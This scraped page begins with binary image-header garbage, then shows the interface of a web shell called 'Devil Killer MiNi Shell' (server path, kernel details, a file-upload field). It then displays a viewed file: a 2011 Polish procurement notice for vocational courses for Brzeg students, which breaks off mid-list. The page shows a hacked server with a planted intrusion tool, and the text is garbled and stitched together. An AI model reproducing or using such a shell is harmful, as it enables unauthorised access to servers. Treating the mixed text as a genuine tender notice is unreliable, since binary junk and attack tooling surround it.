JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111026/353342-N-2011.html

<p class="kh_header"><b>Brzeg: Przeprowadzenie kursów i szkoleń dla uczestników i uczestniczek projektu POKL pn. Profesjonalni w zawodzie</b><br>
<b>Numer ogłoszenia: 353342 - 2011; data zamieszczenia: 26.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Brzeski , ul. Robotnicza 20, 49-300 Brzeg, woj. opolskie, tel. 077 444 79 00, faks 077 444 79 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeg-powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów i szkoleń dla uczestników i uczestniczek projektu POKL pn. Profesjonalni w zawodzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie kursów dla uczniów szkół zawodowych biorących udział w projekcie pn. Profesjonalni w zawodzie, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Uczestnikami kursów będą uczniowie Zespołu Szkół Zawodowych nr 1 w Brzegu, Zespołu Szkół Ekonomicznych w Brzegu, Zespołu Szkół Budowlanych Brzegu, Zespołu Szkół Rolniczych w Żłobiźnie, Zespołu Szkół Rolniczych CKP w Grodkowie 
Szczegółowy opis przedmiotu zamówienia zawarty jest w pkt 18 specyfikacji istotnych warunków zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 80.53.31.00-0, 80.56.20.00-1, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - zał.    nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli Wykonawca udokumentuje posiadanie wiedzy i doświadczenia poprzez wykazanie przeprowadzenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej dwóch usług szkoleniowych odpowiadających swoim rodzajem usługom szkoleniowym stanowiącym przedmiot zamówienia w zakresie części zamówienia na którą wykonawca składa ofertę, z podaniem ich wartości, przedmiotu, dat, wykonania i odbiorców, oraz  załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - zał.    nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - zał.    nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór - zał.    nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy jest przedstawiony w załączniku nr 10 do SIWZ.
Zamawiający informuje, że przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, dotyczące godziny rozpoczęcia i zakończenia szkolenia, miejsca i sposobu realizacji szkolenia, terminu jego rozpoczęcia i zakończenia. Zamawiający dopuszcza przeprowadzenia szkolenia przez osoby inne niż wskazane przez wykonawcę, w przypadku zaistnienia zdarzeń losowych powstałych po zawarciu umowy uniemożliwiających osobom wskazanym do realizacji zamówienia prowadzenie zajęć teoretycznych lub praktycznych. Wykonawca wskaże zamawiającemu przyczyny o których mowa powyżej oraz propozycje nowych osób prowadzących szkolenie. Kwalifikacje i doświadczenie nowych osób muszą odpowiadać kwalifikacjom                     i doświadczeniu osób o jakich mowa w specyfikacji istotnych warunków zamówienia. Warunkiem dopuszczenia nowych osób do realizacji zadań w ramach niniejszej umowy jest akceptacja zamawiającego.

Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron, za zgodą drugiej strony umowy, na podstawie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat.brzeski.opolski.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Robotnicza 20
49-300 Brzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2011 godzina 09:00, miejsce: Starostwo Powiatowe
ul. Robotnicza 20
49-300 Brzeg
parter - Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs prac na wysokości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z obowiązującymi przepisami
Szkolenie praktyczne i teoretyczne umożliwiające zdobycie zawodu alpinisty przemysłowego pozwalający na wykonywanie wszelkich prac na wysokości zarówno w formie alpinizmu przemysłowego(dostępu linowego) jak i podstawowych technik dostępu budowlanego
10 uczniów/uczennic z Zespołu Szkół Ekonomicznych  w Brzegu
30 godzin (na jednego uczestnika)
Listopad - grudzień 2011 ( zajęcia pozalekcyjne( popołudniu) max. 5 godz
Instruktor mający odpowiednie uprawnienia do prowadzenia kursu potwierdzone certyfikatem. Sprzęt posiadający odpowiednie atesty.
Uczestnicy kursu otrzymają zaświadczenie - polski certyfikat na druku MRN-III/I umożliwiający wykonywanie zawodu alpinisty przemysłowego
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs opiekunów i kierowników wycieczek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyposażenie w wiedze i umiejętności merytoryczne potrzebne do pełnienia obowiązków opiekuna/kierownika 
Organizacja zajęć w placówce wypoczynku
Planowanie pracy wychowawczo-opiekuńczej
Obowiązki wychowawcy grupy
Zajęcia kulturalno- oświatowe (gry i zabawy)
Bezpieczeństwo życia i zdrowia uczestników 
10 uczniów/uczennic z Zespołu Szkół Zawodowych nr 1  w Brzegu
30 godzin (na jednego uczestnika)
od 16.01-20.01.2011 godz. 8 00 do 1400 (ferie zimowe)
instruktor mający odpowiednie uprawnienia potwierdzone odpowiednim dokumentem
Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu na drukach MEN potwierdzającym uzyskanie kwalifikacji kierownika wycieczek szkolnych. 
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs fotografii cyfrowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Znaczenie  fotografii
Elementy kompozycji - przedmioty materialne i pusta przestrzeń. 
Trójpodział i złoty podział - najpopularniejsze i najprostsze schematy kompozycyjne.
Podział ukośny i diagonalny - sposób na zwiększenie dynamizmu zdjęć.
Kompozycja oparta na spirali - hipnotyzujące kształty.
Symetria i kompozycja centralna - sposób na statyczny i zrównoważony kadr.
Orientacja i proporcje kadru - jak kreatywnie wykorzystać te dwa elementy.
Punkt widzenia - modelowanie sceny poprzez zmianę położenia aparatu.
Powtarzające się wzory i desenie jako główny element składowy kompozycji.
Kontrast jako główny element składowy kompozycji.
Barwa jako główny element składowy kompozycji.
Równowaga w kadrze.
Przestrzeń życiowa.
10 uczniów/uczennic z Zespołu Szkół Zawodowych nr 1  w Brzegu
26 godzin (na jednego uczestnika)
 od 16.01-19.01.2012 godz. 8 00 do 1300  20.01.2012 od 800 do 1400 
Wykonawca powinien zapewnić niezbędny sprzęt fotograficzny dla każdego uczestnika szkolenia w celu przeprowadzenia kursu
Zaświadczenie o ukończeniu kursu
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs carvingu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Techniki wykrawania w warzywach i owocach. 
Historia i pochodzenie carvingu. 
Omówienie zasad bezpieczeństwa oraz sposoby używania narzędzi.
 Wycinanie liści i kwiatów z różnych warzyw i owoców. 
 Tworzenie kompozycji z wykonanych elementów. 
10 uczniów/uczennic z Zespołu Szkół Zawodowych nr 1  w Brzegu
35 godzin (na jednego uczestnika)
od 16.01-20.01.2011 godz. 8 00 do 1400 
Prowadzący posiadający kwalifikacje i doświadczenie w dziedzinie carvingu, wykonawca zapewni owoce i warzywa niezbędne do przeprowadzenia kursu oraz niezbędny sprzęt- zestawy noży do carvingu dla każdego uczestnika (użyte materiały do kursu oraz powstałe elementy dekoracyjne przechodzą w całości na rzecz zamawiającego)
Zaświadczenie o ukończeniu kursu 
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs barmański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa gości przy barze i przy stoliku 
Higiena i dbałość o własny wizerunek 
Podstawy miksologii:cocktaile, rodzaje drinków: long, short i innedrinki światowe i lokalne
dodatki, składniki dekoracyjne szkło barowe, miary, dodatki uzupełniające 
Terminologia i funkcjonowanie sprzętu barowego 
Podstawy zarządzania barem 
Organizacja i techniki pracy barmana : umeblowanie i wyposażenie, aranżacja
podział alkoholi: piwo, wino, wódki białe i gatunkowe, brandy, koniak, likiery, whisky
Kawa w barze
 Nauka sporządzania drinków na bazie kawy: ekspres do kawy ciśnieniowy zasady parzenia i serwowania kawy drinki na bazie kawy
10 uczniów/uczennic z Zespołu Szkół Zawodowych nr 1  w Brzegu
35 godzin (na jednego uczestnika)
od 16.01-20.01.2012 godz. 8 00 do 1400
Wykonawca zapewni niezbędny sprzęt i produkty do przeprowadzenia kursu.
Zaświadczenie o ukończeniu kursu
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs kierowca wózków jezdniowych z napędem silnikowym   
(elektrycznym i spalinowym w tym gazowym).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z obowiązującymi przepisami
Zakres zajęć:
1.Typy stosowanych wózków jezdniowych  4 godz.
2.Budowa wózków - 8 godz.
3.Czynności operatora przy obsłudze wózków przed podjęciem pracy i po zakończeniu pracy z wózkami - 8 godz.
4.czynności operatora w czasie pracy wózkami - 8 godz.
5.Wiadomości z zakresu ładunkowoznastwa - 4 godz.
6.Wiadomości z zakresu BHP - 8 godz.
7.Bezpieczna wymiana butli na gaz propan-butan w wózkach wyposażonych w te urządzenia - 8 godz.
8.Wiadomości o dozorze technicznym - 4 godz.
9.Praktyczna nauka jazdy i pracy wózkami 15 godz.
grupa I - 10 uczniów  z Zespołu Szkół Zawodowych nr 1   w Brzegu
grupa II -  10 uczniów z Zespołu Szkół Budowlanych w Brzegu
grupa III - 12 uczniów z Zespołu Szkół Ekonomicznych  w Brzegu
grupa IV - 30 uczniów z Zespołu Szkół Rolniczych CKP   w  Grodkowie
grupa V - 6 uczniów z Zespołu Szkół Rolniczych w Żłobiżnie
67 godz. na jednego uczestnika
grupa I - od 16.01-20.01.2012godz. 8 00 do 1600 oraz  w lutym i marcu dwa razy w tygodniu po 3 godz. przewidywany termin 07.02-01.03.2012
grupa II -  16-27.01.2012r.
grupa III -  luty- maj 2012 (dwa razy w tygodniu po 4 godziny)
grupa IV - marzec-kwiecień 2012 
grupa V - 10.12.2011; 17.12.2011; 16.01.2012- 20.01.2012;04.02.2012
instruktor mający odpowiednie uprawnienia do prowadzenia kursów kierowców wózków jezdniowych z napędem silnikowym potwierdzone certyfikatem
Uczestnicy kursu otrzymają bezterminowe zaświadczenie kwalifikacyjne uprawniające do kierowania i operowania wózkami widłowymi wszystkich typów i na wszystkie rodzaje paliw w tym na gaz z certyfikatem, także w języku angielskim ( ważnym w krajach UE).
Organizator pokrywa koszt:
	koszty egzaminu, certyfikatu świadectwa,
	materiałów szkoleniowych i pomocy dydaktycznych oraz innych kosztów udziału w kursie (np. ubezpieczenie),
	badań lekarskich,
	sal szkoleniowych.
